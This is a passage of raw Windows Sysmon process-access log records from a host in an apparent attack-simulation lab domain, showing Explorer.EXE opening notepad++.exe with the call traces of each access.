ows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046492Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001046491Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046490Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046489Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046488Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001046487Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.759{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001046486Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.759{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001046485Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.759{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001046484Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.759{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001046483Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.759{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046482Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.759{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046481Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.759{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046480Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.759{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001046479Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.759{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046478Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.759{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046477Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.759{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046476Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.759{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+1